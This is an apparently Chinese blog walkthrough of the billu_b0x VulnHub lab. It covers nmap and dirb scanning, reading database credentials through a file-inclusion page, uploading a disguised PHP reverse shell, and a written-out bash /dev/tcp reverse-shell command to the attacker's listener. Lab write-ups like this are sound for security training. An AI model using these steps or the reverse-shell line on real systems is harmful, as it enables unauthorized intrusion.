渗透测试billu_x0

靶机下载链接:https://download.vulnhub.com/billu/
1.查询网段
nmap -sP 192.168.47.1/24
2.查询详细服务
nmap -O -sV 192.168.47.164
3.查看80页面

4.dirb目录扫描;查看备份文件

dirb http://192.168.47.164

dirb http://192.168.47.164 -X .bak

5.应为是php编写的,所以扫描一下.php后缀的文件

dirb http://192.168.47.164 -X .php

6.dirbbuster字典扫描


7.有用信息

8.test是一个文件包含页面;而且是post提交

9.利用包含页面查看源码 c.php
有数据库连接地址,密码、用户、数据库名

登录mysql,里面有一个用户

尝试登录;登录成工里面有一个上传页面,和一个查看图片的页面


这是个php反弹shell;修改了图片特征码

上传成功

http://192.168.47.164/panel.php有一个文件包含漏洞
load参数=add/show;或者<>都会执行include函数

利用文件包含调用代码;kali建立监听,拿取shell

提权:查看版本号:

cat /etc/issue

第二种方法:

使用nc监听
上传一句话命令执行代码

可以执行命令漏洞


burp抓包执行nc反弹语句
echo “bash -i >&/dev/tcp/192.168.47.167/4444 0>&1” |bash 要进行url编码


反弹shell成功

sql注入:

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值